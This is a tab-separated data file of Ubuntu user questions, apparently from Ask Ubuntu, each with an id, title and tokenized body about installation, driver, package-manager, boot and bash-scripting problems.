421174	how do i uninstall extreme download manager ?	how do i uninstall extreme download manager on ubuntu 12.04 ? that means also getting rid of the icon that appears in the application area of dash as well as all the java related stuff that was downloaded with it . i tried using 'sudo apt-get purge xdman ' but i am not certain that that did the job : ( please tell me that i did n't make things worse , please ! ) . i was told that xdman was uninstalled but all the java related stuff is still in the history section of the ubuntu software center and the extreme download manager icon is still in the app section of dash . and i want to get rid of that also . i have heard that java is dangerous because its loaded with spyware etc ! thanks
421175	cache failed ubuntu 13.10	i just installed ubuntu 13.10 and i tried to update via terminal sudo apt-get update everything seemed to be running normally and is still running i just cant get anything from the software center and at the end of the update process it displayed this failed to fetch gzip : /var/lib/apt/lists/partial/us.archive.ubuntu.com_ubuntu_dists_saucy_main_binary-i386_packages and whenever i try to install anything from the software center it says something is wrong with the cache or something like that ... how can i be able to install software from usc
421176	bash script to check if mdadm is installed if not it will install it	working on a bash script which first will check if mdadm is installed , if not it will install it . this is my script but it 's not working correctly . hope someone can help me . if [ `` $ mdadm '' = `` mdadm '' ] then echo -e `` mdadm is installed.\n '' else echo -e `` install mdadm .\n '' aptitude -y install $ mdadm fi
421184	wlan & video card problem : macbook pro 7,1 mid-2010	i would like to request your kind assistance in troubleshooting i have with my mbp running on snow leopard ( 10.6 ) but recently installed an ubuntu 12.10 alongside the system . basically everything works out of the fresh install except for the two raised problems . i 'm quite new to ubuntu and i do n't have any programming knowledge nor have the idea on using terminal on both osx and ubuntu . i 'm trying this to expand my knowledge and refreshen my work environment . here are the screenshots of the problem . broadcom wlan driver is installed , just like what the [ guide ] [ 1 ] for installation have recommended yet somehow the driver is not enabled . screenshot img of wlan problem while my nvdia 320m is also not being utilised well by ubuntu . the guide here says that i should install a propriety driver specifically the nvidia binary xorg driver for nvidia 310. somehow , when i open software sources , this driver installation does n't show up . so i settled for an unstable open-source version . can you please help me through the process of where to download these drivers and installing them ? thanks
421185	i ca n't install anything in ubuntu 12.04	i am a new user of ubuntu , first time in linux world . i do n't manage to install anything neither from the ubuntu software center not elsewhere . for example i try to install chrome ( i have downloaded the xxx.deb file ) ... after double clicking i am moved to the installation area ... i click on install and then i get warning message that `` requires the installation of non-trusted packets '' ( of course in the local language ) . then if i click ok i got nothing , if i click the `` restore '' ( the other option ) the installation seems to start . the progress in menu shows 2 steps but later i got he error `` failed to retrieve repository information '' , check the internet connection ... of course the internet is there as i have browsing . when i click on details i got a lot of lines about failures to fetch various things can somebody help me ?
421191	network-manager missing from 12.04 repos	i 'm using 12.04 which is fully updated with a gnome 3.4.2 desktop . i noticed yesterday that while using synaptic package manager that network-manager and some libnm dependencies are under the local/obsolete section . these packages are installed but are no longer in the repos on my machine . network-manager-gnome is in my repos still though . this obviously is n't effecting the functionality of my machine but i 'm stumped as to what is going on . any help would be greatly appreciated . i 've searched that web and so far have come up empty handed .
421192	installation does n't detect windows 7	my laptop came with ubuntu . i removed it to install windows 7 64-bit . i do n't remember if i did anything special , i just formatted the entire hard drive . now i am trying to install ubuntu 13.10 alongside windows , but the ubuntu installer says : this computer currently has no detected operating system and gives me 4 options : • erase disk and install ubuntu • encrypt the new ubuntu ... .. • use lvm with ... ... • something else i tried all the solutions i could find . ran gdisk and for //./partition0 and //./partition1 it shows : mbr : mbr only bsd : not present apm : not present gpt : not present computer management shows 5 partition , 4 ntfs and 1 raw 10gb space which i planned to install ubuntu on . c : , raw space and system reserved 100mb are primary partitions , other 2 are logical drive . secure boot option is disabled in bios and legacy boot is selected . please suggest a way to get the job done .
421194	how to make it wokr dvb-t usb a867 on kernel 3.13.3	i have kernel 3.13.3 and dvb-t usb tuner a867 based on chip af9035 . what can i do to make this tuner work on kernel 3.13.3 ?
421196	all created files on a ntfs partition with user mapping defaults to root owner	i 've just migrated to ubuntu from another distribution , and where previously my ntfs partitions worked with the addition of a user mapping file , now all the newly created files will have the owner set to root , but otherwise everything works as expected . i 've created the user mapping file as described at this page . i also tried to remount the partition with both ‘permissions’ and ‘inherit’ parameters , without success . ( i have a feeling , that not the proper ntfs driver is used for this . ) what i would like to achieve here is a similar functionality what i have on windows . this is an external usb hard drive , and so i would like to avoid adding an entry in fstab if possible . why can this happen , and how it can be solved temporally/permanently ?
421198	how to disable menu items with ... extension in firefox ?	i want to disable the menu items with ( dotted ) extension i.e . 3 dots . like send link , save page as .
421200	i 'm beginners in ubuntu just need your help	i user ubuntu 12.04 . i am new to this system and am admittedly lost most of the time . is there someone out there that would n't mind mentoring an old man ?
421201	why am i unable to install ubuntu on my laptop ?	whenever i am keeping bootable usb and trying to install , my laptop is shutting down eventhough my laptop is on charging.i am unable to find out the reason for this problem . i am using windows 7 home basic os . my laptop is hp pavilion g6 with amd-a6 processor . will this makes an difference . please help me for installing ubuntu on my pc .
421202	amd/radeon configuration , always problems ?	always when i install ubuntu ( 3 versions so far ) i have problems with my grahic card . ubuntu does not support radeon hd 6770 ? i have amd x4 965 processor . always bugs , glitches , problems ... '' ... has stop working '' ... etc . picture just freeze , and all that stuff . where is problem ? when i want to install aditional driver , it says it can not be installed . how i can use ubuntu smooth as silk without bugs . software center is bugging , too . skype sound is too robotized . whats the problem ...
421203	how to force overwrite of non-debian package ?	background i am trying to install google drive , so i am installing grive . i previously tried to install syncdrive , which is no longer supported . now , i am having some conflicts between the two installations . ( i am on ubuntu 13.10 ) problem my installation of grive was not working , indicating some missing dependencies . so i ran sudo apt-get -f install , but it gives me the following error : unpacking grive ( from ... /grive_0.3.0-1+git20131016~thefanclub~saucy1_amd64.deb ) ... dpkg : error processing /var/cache/apt/archives/grive_0.3.0-1+git20131016~thefanclub~saucy1_amd64.deb ( -- unpack ) : trying to overwrite '/usr/bin/grive ' , which is also in package syncdrive 0.9-1 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) i tried to fix this using sudo dpkg -i -- force-overwrite /usr/bin/grive , but it is not a debian package . so , how can i resolve this problem ? is there a way to force the overwrite of /usr/bin/grive ?
421204	installing ubuntu along with window 7	i have two drives : c and d windows 7 ( 32-bit ) is installed on c and there are certain programs and data on drive d. i want to install ubuntu ( 64-bit ) on my pc . so i want to create a new drive for installing ubuntu . what should i do ?
421205	open window in specific workspace	i have made a keyboard shortcut for firefox like so : keyboard/shortcuts/customized shortcuts/ command line : firefox new accelerator : alt+f i can open a firefox window by pressing alt+e , but i am looking for a way to open a maximized firefox window in workspace 4 if this is possible . i have tried using compizconfig settings manager , but i did n't find a way to do this . thanks
421208	nvidia display driver installed but not working 13.10	i have a shuttle sn41g2 and i belive the correct nvidia drivers are installed but the screen is blank . i have tried the 'top tips ' from the internet but with no success . thank you . i have tried the following which seemed to complete ... sudo apt-get install nvidia-current-updates sudo nvidia-xconfig after boot up , i can see the message nvrm no nvidia adaptor found it turns out the drivers i had installed were the newest but not correct . so i have downloaded nvidia driver version 96.43.07 . as suggested by an error message in /var/log/dmseg . i now get the following error : error : the kernel header file '/lib/modules/3.11.0-15-generic/build/inclu/linux/version.h ' does not exist . the most likely reason for this is that the kernel source files in '/lib/modules/3.11.0-15-generic/build ' have not been configured . i understand that there is some pre-compiled kernel task to do . ( whatever that is ? ) so how do i do that ? thank you . dpkg -l | grep linux-headers results in ... ii linux-headers-3.11.0-123.11.0-12.19 all header files related to linux kernel version 3.11.0 ii linux-headers-3.11.0-12-generic 3.11.0-12.19 i386 linux kernel headers for version 3.11.0 on 32 bit x86 smp ii linux-headers-3.11.0-15 3.11.0-15.25 all header files related to linux kernel version 3.11.0 ii linux-headers-3.11.0-15-generi 3.11.0-15.25 i386 linux kernel headers for version 3.11.0 on 32 bit x86 smp ii linux-headers-3.11.0-15-lowlatency 3.11.0-15.8 i386 linux kernel headers for version 3.11.0 on x86/x86_64 update : it looks like i need to configure the kernel source files in /lib/modules/3.11.0-15-generic/build so that version.h is available from /lib/modules/3.11.0-15-generic/build . does anyone know how to configure these files ?
421209	hdmi output on dell l502x with ubuntu 12.04	this is yet another post about getting the hdmi output working on del xps l502x . i have got ubuntu 12.04 lts with bumblee . i running my monitor via the mini display port , but the trouble is getting my tv connected to the laptop . i have tried almost everything that i 've found on the web ... with no luck . has anyone got this working ? thanks .
421212	ubuntu 12.04 issue reading hard drive	my laptop used to keep crashing . so i got a new one . the hard drive of my old laptop- they put in a case and i was able to read it as soon as i got home . but now , when i try to mount it , i get an error - hdio_get_identity failed for '/dev/sdb ' : invalid argument the hard disk ( old laptop ) was dual boot , with ubuntu and windows . my current ubuntu version is 12.04 . i tried recovery with testdisk , photorec etc and managed to get some folders/files , but the critical folders could not be recovered . how can i recover the data ? i tried gparted - no use . fdisk output - sudo fdisk -l /dev/sdb disk /dev/sdb : 320.1 gb , 320072932352 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142446 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/sdb does n't contain a valid partition table
421213	booting the ubuntu 12.04 lts installer from usb stick	i receive the following rather cryptic error message when following the instructions on how to create a bootable usb stick on windows on ubuntu.com using windows 8 : syslinux 4.07 edd 2013-07-25 copyright ( c ) 1994-2013 h. peter anvin et al unknow keyword in configuration file : \╨╤ no default or ui configuration directive found ! i did find the very similar question “unknown keyword in configuration file boot : ” error when booting off a live usb on askubuntu . however none of the proposed solutions work in my case . there is no syslinux/syslinux.cfg on the usb stick and entering help at the boot prompt does n't have any effect either . could the error message \╨╤ indicate an encoding issue with either one of the configuration files ? update : the contents of /uui/syslinux.cfg read as follows : # this file was automatically populated by universal usb installer - http : //www.pendrivelinux.com prompt 0 default append label append config /isolinux/isolinux.cfg append /isolinux
421216	how to specify what network to connect to automatically ?	i 'm on xubuntu 13.10 , i can connect to two different networks , x and y , i have passwords to both network and i can switch between them at will . when xubuntu starts , it automatically connect to y , i want it to connect to x unless i manually choose y . note that when i was on windows 7 , i had the same issue , now that i 'm on linux i hope that a bash script or something will do the trick .
421218	prevent my screen from either dimming or the screen-lock when watching movies in 12.10	i watch movies in vlc or some time movie player.my screen gets off ( stand by ) frequently.. can i do any thing.i an using lxde on ubuntu 12.10.pls answer ... .
421219	usb : enable trim ( fitrim ioctl failed : operation not supported )	first of all , i am pretty surprised my usb flash device supports trim : sudo hdparm -i /dev/sdb | grep 'model\|trim ' gives me : model number : sandisk ssd cz80 32gb * data set management trim supported ( limit 8 blocks ) * deterministic read data after trim the usb stick is formatted with ext4 . so according to hdparm , trim should work . however when i switch to the device and run : sudo fstrim ./ it gives me : fstrim : ./ : fitrim ioctl failed : operation not supported so what could be the issue here ? does hdparm lie about trim support , or could there be an other issue ? who to ask to debug such issues ? ( info : fstrim works very well with my internal ssd ) . full output of hdparm -i /dev/sdb can be found here : http : //paste.ubuntu.com/6944144/
421220	start up and shut down logs	i would like to clean up my laptop , i am not that clued up here so please could i get some assistance with this please ? you can email and i can send the logs to you and see what can be done please as they seem to be way too big to copy and paste here ? thank you so very much
421222	how to install mysql version 5.0.18 in ubuntu 12.04 ?	i have done the following : sudo apt-get purge mysql-server mysql-common sudo apt-get update & & sudo apt-get upgrade sudo apt-get autoremove sudo apt-get autoclean this uninstalled mysql 5.5 : sudo tar -xvzf mysql-5.0.18.tar.gz -- directory=/usr/local/src cd /usr/local/src/mysql-4.1.24/ sudo groupadd mysql sudo useradd -g mysql mysql i then did sudo apt-get install . i expected that after running this it should start installation but its saying 0 upgraded and i have the unzipped entire file and file contents at source location . list item sudo ./configure -- prefix=/usr/local/mysql sudo make how can i install mysql 5.0.18 on ubuntu 12.04 ?
421227	moving banshee to a new pc	i have searched and found a few answers on this topic but they do not answer my question : moving banshee music to another computer how do i backup my banshee listening history ? how do i export banshee library settings to another machine ? i have just got an ssd hdd and have performed a totally fresh ubuntu install . i am manually transferring the settings of programs i want . i have been saving metadata to files but this is insufficient as it has not worked for all album art and has not saved scores and `` date added '' paramters used in banshee . i have copied banshee-1 into the new install , and banshee now loads with all the files , scores , `` date added '' and playlists etc but : my music is mounted at /media/sda2/guy/music on the old install and this is where banshee is looking for it , but this location is now called /media/pc-user/0391a5db-61d8-4c3d-b633-59c710ed4386/guy/music how can i fix this ? i tried renaming the mount point in `` disks '' but this gives a mount error for sda2 on boot . additionally , with the files not found as they are , banshee is not displaying album art - is it not stored in banshee-1 ? thanks
421228	amd radeon hd 8700m black screen after installing ubuntu 13.10 ?	i installed ubuntu 13.10 and i 'm getting a low graphics warning . i installed the latest driver from amd ( version 13.35 , which is the latest release ) but i 'm still getting the same low graphics warning and occasionally a black screen . how can i resolve this issue ?
421229	how to split string in bash and store the tokens in array	i wrote this script to store some information about my machine such as the users and the running processes . i tried to store the retrieved data into an array . to test array i printed the length of an array as follows : # ! /bin/bash # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # openfilescount= $ ( lsof -fn -u teeba| sort | uniq | grep /home | wc -l ) ; openportscount= $ ( lsof -fn -u teeba| sort | uniq | grep /home | wc -l ) ; readingtime= $ ( date + % y- % m- % d_ % t ) ; usersarr= $ ( awk -f : ' $ 3 > = 1000 & & $ 1 ! = `` nobody '' { print $ 1 } ' /etc/passwd ) ; pidsarr= $ ( ps axo pid ) ; # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # echo `` $ { # usersarr [ @ ] } '' ; the output is 1 ... although the users are three ? do i need to split the retrieved data on `` \n '' for example before store it in the array ? if yes , how ?
421230	how to switch user on ubuntu server 12.4	i just downloaded ubuntu 12.4 server , at the begging there was only root user so i added new user and switch off the root user . the problem now i do n't have any permeations and when i type `` sudo command '' the result : sudo : must be setuid root when i try to use su : su : authentication failure i am locked now , any idea how to sort this problem out ? thanks
421231	how to set 1366x766 or 16:9 screen resolution ?	i am using ubuntu 12.04 lts on my pc , which has a digilite dl-g41mxe-ib motherboard . in my os there are only two default screen resolutions 1024x768 and 800x600 . how i can get 1366x766 ( 16:9 ) resolution or how to install motherboard drivers ?
421232	open locations through application finder ?	it would be really fast to open most used folders by an application finder or something like that . it worked quite well in windows pressing win+r and type name of a folder shortcut in system32 folder . is it possible to do something like that in xubuntu too ? e.g . win+r to open application finder ( or something similar ) and type `` do '' to open dowloads folder ? how would you do that ? now i need to open default folder and then click to a left panel . i understand it 's easier to assign a shortcut to each location but that 's not managable if you have many locations . i do n't really like docks neither because cairo always got stucked and did some troubles to me ... how would you solve this problem ? thanks in advance . sebastian
421233	enabling .htaccess file to rewrite path ( not working )	all the tutorials tell me to edit the : /etc/apache2/sites-available/default but this file does n't exist for me . within this file i would have to edit the : < directory /var/www/ > options indexes followsymlinks multiviews allowoverride none # allowoverride all # allowoverride authconfig fileinfo indexes limit options=all , multiviews order allow , deny allow from all < /directory > what should the file look like and should i create it myself ? aslo i do have a 000-default.conf file but the above 'code ' is n't in there either .
421234	hp pavillion 15 e016tx bluetooth adapter is not found ubuntu 13.04	i recently installed ubuntu 13.04 ( clean installation ) . wifi is working automatically though the shortcut button which was given by hp is not working to turn it on or off . my problem is that bluetooth is not working at all . in the settings it 's showing bluetooth adapter not found . i also installed elementary os along with ubuntu 13.04 ( dual boot ) and bluetooth is working in this os but not wifi - it 's saying wifi adapter not found.. what should i do now to get my bluetooth and wifi work ? where can i found drivers for them ?
421235	menubar in digikam	i do not see menu bar after fresh install of digikam ( 3.1.0 ) . it was never displayed . i found that maybe edit of ~/.kde/share/config/digikamrc would help , but there is no menubar=disabled anywhere . without menu the application is practically useless . any ideas ?
421240	how to submit bug fixes on launchpad ?	i 'm on xubuntu , i fixed some bugs for some application that runs on ubuntu and debian , how to submit those bug fixes to launchpad ? the dev team confirmed the bug but did n't assign anyone , i waited a week , so i assigned myself and fixed everything , what 's next ? i 've seen this question , but the project i 'm working on is big in size . so is n't it possible , to upload just 1 file from my computer to the launchpad repo , without having to download the whole thing and push the whole thing ? i just want to add a file . less than 1 kb . and is it possible to fix the debian package from my ubuntu ? or do i have to have a debian for that ?
421241	ubuntu 13 upgrade issues	i am new to ubuntu so i 'm not sure why i keep getting this every time i try to install/upgrade something . below is just an example of the error : w : failed to fetch http : //ppa.launchpad.net/deluge-team/ppa/ubuntu/dists/saucy/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/deluge-team/ppa/ubuntu/dists/saucy/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . any ideas ?
421242	grub rescue in new installation invalid arch-dependent elf magic	i installed ubuntu over a w8 installation ( my objective was that only ubuntu remains ) , the installation completed well and ask to reboot , after that , it only gives me a black screen and grub rescue > appeared on the screen . i tried to follow the guide from here : fixing grub error : âerror : unknown filesystemâ i was capable of finding the .mod files , but a series of issues emerges . *if found the files in ( hd0 , gpt5 ) , is the `` gpt '' a concern ? ? ? * after setting set prefix= ( hd0 , gpt5 ) /boot/grub and trying to load the module insmod normal computer says : error : file '/boot/grub/x86_64-efi/normal.mod ' not found i dont know why it adds the extra 'x86_64-efi ' in the directory . given that the solution doesnt work , i tried loading the module with the complete directory : insmod ( hd0 , gpt5 ) /boot/grub/normal.mod but this time computer says `` invalid arch-dependent elf magic '' . i havent been myself capable of advance more than this on my own , please help . update i was capable of run `` try ubuntu '' from the live usb , i can see all my partitions , the partition with the ubuntu files , the partition with all my data , i would only like to know how to make that ubuntu starts on reboot , nothing else , please help .
421246	install vlc media player on ubuntu 13.10	i am trying to install vlc media player and receiving the following error package dependencies can not be resolved . this error could be caused by required additional software packages which are missing or not installable . there could be a conflict between software packages which are not allowed to be installed at the same time
421249	how to store the array length in a variable in bash scripting language	i stored some information about the system in an arrays .. and i tried to store the length of an array in a variable then print the value of the variable on the terminal , but there is no output ! # ! /bin/bash # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # openfilescount= $ ( lsof -fn -u teeba| sort | uniq | grep /home | wc -l ) ; openportscount= $ ( lsof -fn -u teeba| sort | uniq | grep /home | wc -l ) ; readingtime= $ ( date + % y- % m- % d_ % t ) ; usersarr= ( $ ( awk -f : ' $ 3 > = 1000 & & $ 1 ! = `` nobody '' { print $ 1 } ' /etc/passwd ) ) ; pidsarr= ( $ ( ps axo pid ) ) ; lastidex= $ { # usersarr [ @ ] } ; # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # echo `` $ lastindex '' ; where is the error ? how to store the array 's length in a variable ?
421253	how to locate a program ?	i installed passwordsafe 0.93 beta by downloading its deb-package from sourceforge and have it taken care of using ubuntu software center . now passwordsafe asks me every time what psafe3-file to load instead of offering me a default one - as it used to be with the windows version of it . so i thought about having a look at passwordsafe and its ( probably existing ) config files and see if i can edit them appropriately . but this endeavour fails at locating the program and its related stuff . how do i go about finding it ?
421256	how to silence items in sytem notification	i have two notifications that haunt me on kubuntu 13.10 , and i would like for a way to suppress them , at any cost . 1 . ) connection 'netgear18 ' deactivated ! this comes from my crappy wireless card driver constantly de- and re- authenticating ( known issue with the broadcom 4313 , but it works well enough for me to give up ) 2 . ) bell session in shell my media player ncmpcpp sometimes throws a bell session when it switches songs , and i do n't need to hear about it ! removing the system tray just causes the notification to show up somewhere else on the screen . in a fit of rage i killed knotify , but it respawns . can i tell it to ignore certain types of message ?
421260	shell commands for system administration , and gudie to vi editor	i 'm very much interested in shell commands in fact , i know some basic commands . but i want to learn more about them . are there any good resources ? i 'm interested to learn more about vi editor too .
421261	cdrom support broken after kubuntu 13.10 upgrade	cdrom no longer functional after 13.04 - > 13.10 kubuntu upgrade eject works intermittently mount /dev/sr0 /cdrom hangs until i manually eject the disk k3b sometimes fails to start , when it starts it either reports no optical or no writable disk lshw hangs until i ctrl-c it # dmesg | grep -b9 -a9 cd-rom [ 1.767897 ] usb 2-3 : manufacturer : bison corp. [ 1.770514 ] console : switching to colour frame buffer device 170x48 [ 1.776752 ] radeon 0000:00:01.0 : fb0 : radeondrmfb frame buffer device [ 1.776755 ] radeon 0000:00:01.0 : registered panic notifier [ 1.777056 ] [ drm ] initialized radeon 2.34.0 20080528 for 0000:00:01.0 on minor 0 [ 1.824309 ] ata4 : sata link up 3.0 gbps ( sstatus 123 scontrol 300 ) [ 1.824368 ] ata2 : sata link up 1.5 gbps ( sstatus 113 scontrol 300 ) [ 1.836818 ] ata2.00 : atapi : matshitadvd-ram uj8b1as , 8.21 , max udma/100 [ 1.850083 ] ata2.00 : configured for udma/100 [ 1.856436 ] scsi 1:0:0:0 : cd-rom matshita dvd-ram uj8b1as 8.21 pq : 0 ansi : 5 [ 1.859393 ] sr0 : scsi3-mmc drive : 62x/62x writer dvd-ram cd/rw xa/form2 cdda tray [ 1.859400 ] cdrom : uniform cd-rom driver revision : 3.20 [ 1.859783 ] sr 1:0:0:0 : attached scsi cd-rom sr0 [ 1.859957 ] sr 1:0:0:0 : attached scsi generic sg0 type 5 [ 1.874442 ] ata4.00 : ata-8 : st9500325as , 0011lvm1 , max udma/100 [ 1.874449 ] ata4.00 : 976773168 sectors , multi 16 : lba48 ncq ( depth 31/32 ) [ 1.877317 ] ata4.00 : configured for udma/100 [ 1.877783 ] scsi 3:0:0:0 : direct-access ata st9500325as 0011 pq : 0 ansi : 5 [ 1.877997 ] sd 3:0:0:0 : [ sda ] 976773168 512-byte logical blocks : ( 500 gb/465 gib ) [ 1.878084 ] sd 3:0:0:0 : attached scsi generic sg1 type 0 [ 1.878302 ] sd 3:0:0:0 : [ sda ] write protect is off [ 1.878305 ] sd 3:0:0:0 : [ sda ] mode sense : 00 3a 00 00 i 'm guessing this is a kernel regression relating to the merging of ata and scsi device handling any solutions ? thanks
421262	i 've installed ubuntu 12.04 along side windows 8 and can no longer boot into windows	i 've installed ubuntu 12.04 along side windows 8 and can no longer boot into windows . grub shows windows 8 as an option but when i select it i see the windows logo for a minute and then the screen goes black . i did not have this problem after the initial install , it began 2 days later .
421265	streaming music with ubuntu one	i have music files , ( .mp3 ) can i upload it to ubuntu one and stream it with clementine without buying songs from ubuntu one music . do i have to be a paid subscriber to stream music from ubuntu one with clementine .
421270	wireless connected but internet not working or extremely slow . ubuntu 12.04 on samsung n210	i 've finally got ubuntu installed but the wireless internet connection either does n't work or runs extremely slowly . i also have windows 7 and the internet works , but only because i updated my wirelss driver ( it was exactly the same as it is now on ubuntu prior to that ) . i know there are many similar postings on here but they seem either too complex for me to understand or simply give me error messages when i try the given solutions . if anyone can help , please just tell me what i need to do in order to give you the information you might need , bearing in mind i 'm not an advanced user . thanks in advance ! the information requested from lspci : network controller [ 0280 ] : realtek semiconductor co. , ltd. rtl8192e/rtl8192se wireless lan controller [ 10ec:8192 ] ( rev 01 ) thanks !
421271	how to extend ext4 with gparted ?	i am having short in disk space in my ubuntu /dev/sda6 and i have 11.08 gb of free space unallocated in the sense.i have followed different article about the repartition but they are not working here when i try to move/resize sda6 the there will not be any free space to extend but it reduce if we try . notice : -i know it 's mounted for posting the queries i have to take screenshot so the mount option is there , i have used gparted by liveusb ... i think so /dev/sda4 blocked other access.please help me here about resizing the sda6 . i have also followed method of given link below : how do i repartition with gparted ? but still not working
421278	how to install digilite dl-g41mxe-ib motherboard drivers ?	how to install digilite dl-g41mxe-ib motherboard drivers with dvd . when i try to to install with dvd like in windows ubuntu shows an error .
421280	static ip in ubuntu 13.10 & how to loop/run terminal commands at startup	i need help . i want to obtain a static ip address and loop a terminal command on startup , so when the computer boots up , it launches a terminal window that loops a command over and over again . and , i want a static ip , i know the default gateway and mask .
421286	ca n't boot in ubuntu 12.04 after running janitor ( from ubuntu tweak )	i 'm having troubles booting into ubuntu 12.04 after running janitor . i did try to clean up the system with janitor because of a pop-up message that my system is running low on memory : i do n't really remember what was the exact message , but something like this : '' file system root has only ... mb left ... '' . however , i start the clean up of app 's caches , system configs , etc . with janitor and after reboot i have this screen : ( please see the images ) when i press on/off button to stop , because it does nothing ( i guess ) it displays before the system shut downs a line of text : '' stopping preload : preload ... '' any advice what i can do to resolve this . i 've tried also booting into safe mode - the result was the same .
421288	the screen dos n't dim and go blank after specified system iddle time . ubuntu 13.10	after upgrading from ubuntu 13.04 to 13.10 the screen does not dim and go blank after specified idle time in system settings - > brightness & blocking . the pc is lenovo ideapad z580a . video mode is optimus ( nvidia + intel ) different blocking settings does not helpful . how to automatically switch off the screen . with best regards . viktor .
421291	i cant see unity on my desktop	i can see anything on my desktop but the background only . how can i get that back ? i have tried typing unity in the terminal and it gave me all back but now i just ca n't get it . an error message came that my system i running on low graphics but i tried to change it i could not alter it and after i do n't know how to fix it . i have tried reinstalling unity but all in vain .
421292	installing ubuntu 12.04 on a laptop with a external display only	i have a old dell laptop that i use as a media computer hooked to my tv . it was in rough shape when it was given to me as it has a broken keyboard and screen . i have been using it with my tv or my spare monitor and a wireless keyboard/mouse with windows 7 . when i go to install ubuntu the external screen turns off right away . my guess is that it is defaulting to the oem screen which has now been removed . i have tried fn f7 on my external keyboard to swap screens but i have had no luck . i have wiped windows i would rather ubuntu but i did not expect this . i was thinking of trying a different disro but i have ubuntu on 3 other computers thoughts ?
421297	usb hdd becoming irreversibly read-only	i 'm having problem with an external usb hard drive ( fat32 ) . seems impossible to write , delete etc files , i get error messages saying it is a read only file system . when i try to solve the problem using the chmod or chown commands it hangs , and anyway till the point it hangs it gives many ( many ) messages saying `` can not change ... . read-only filesystem '' needless to say i m the ( literal ) owner of the drive and i have no idea how this could be considered a read-only drive , never been my intention . and formatting is not an option , the thing is loaded with stuff that 's very valuable ( for me ) . that 's what i get when i type the mount command /dev/sda1 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc ( rw , noexec , nosuid , nodev ) gvfs-fuse-daemon on /home/woodpecker/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=woodpecker ) /dev/sdc1 on /media/musica type vfat ( rw , nosuid , nodev , uid=1000 , gid=1000 , shortname=mixed , dmask=0077 , utf8=1 , showexec , flush , uhelper=udisks ) /dev/sdd1 on /media/usb-hdd type vfat ( rw , nosuid , nodev , uid=1000 , gid=1000 , shortname=mixed , dmask=0077 , utf8=1 , showexec , flush , uhelper=udisks ) from time to time i get the same problem with flash disks , but then after unmounting and remounting some times i get it solved . another external usb drive that is almost constantly connected has never had any problem whatsoever ... i understand many people have similar problems but i have n't been able to find any solution that works for me anywhere on the internet : ( any tips ? thanx
421298	i booted to ubuntu 13.10 but i 'm stuck at the command line	i 'm new to linux so i really know nuts about this . so i dual booted win7 and ubuntu 13.10 , but when i boot to ubuntu 13.10 , i am stuck at the grub/command line . how do i boot to the desktop ?
421313	how to automatically save file with nautilus without specifying location with firefox / iceweael ?	i have set it to always save file with files of a .xls extension . however it always asks me for a download location . there is a script that downloads multiple files so i would prefer to avoid specifying location and for it to automatically download to the default folder . screenshot below : i would like to skip the above step and just automatically download to the default location . can this be done ?
421315	unable to update system due to 'package dependencies can not be resolved '	i am getting the following error : this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . here are more details : libgl1-mesa-dev : depends : mesa-common-dev ( = 9.2.0~git20131002+9.2.2eb55601-0ubuntu0sarvatt~precise ) but 9.2.0~git20131002+9.2.2eb55601-0ubuntu0sarvatt~precise is to be installed depends : libgl1-mesa-glx ( = 9.2.0~git20131002+9.2.2eb55601-0ubuntu0sarvatt~precise ) but 9.2.0~git20131002+9.2.2eb55601-0ubuntu0sarvatt~precise is to be installed
421318	problem with apt-get	whenever i run apt-get in terminal i always get the same error apt-get : /lib/x86_64-linux-gnu/libc.so.6 : version `glibc_2.17 ' not found ( required by /usr/lib/x86_64-linux-gnu/libstdc++.so.6 ) i dont know is this a bug ?
421321	i 'm trying to get touchegg to interpret a three fingered swipe as alt+direction , but i ca n't get it to work	i added the following in my .config/toughegg/touchegg.config < gesture type= '' drag '' fingers= '' 3 '' direction= '' down '' > < action type= '' send_keys '' > alt+down < /action > < /gesture > < gesture type= '' drag '' fingers= '' 3 '' direction= '' left '' > < action type= '' send_keys '' > alt+left < /action > < /gesture > < gesture type= '' drag '' fingers= '' 3 '' direction= '' right '' > < action type= '' send_keys '' > alt+right < /action > < /gesture > < gesture type= '' drag '' fingers= '' 3 '' direction= '' up '' > < action type= '' send_keys '' > alt+up < /action > < /gesture > when i ran touchegg , nothing seemed to happen when i tried the keystrokes . what do ? also i just noticed when i run touchegg it says : segmentation fault ( core dumped ) would that not run the program ?
421327	ubuntu boot-stick	i 'm trying to create an ubuntu live usb i following the steps from `` universal usb installer 1.9.5.2 '' but i have the same error every time : 0 can not open autorun.inf the ubuntu iso is the latest version ( i think it is 12.04 )
421330	make : *** no rule to make -- target `build ' error	when i setting up development environment in docker , i got a problem like this : cd docker sudo make build make : *** no rule to make target `build ' . stop .
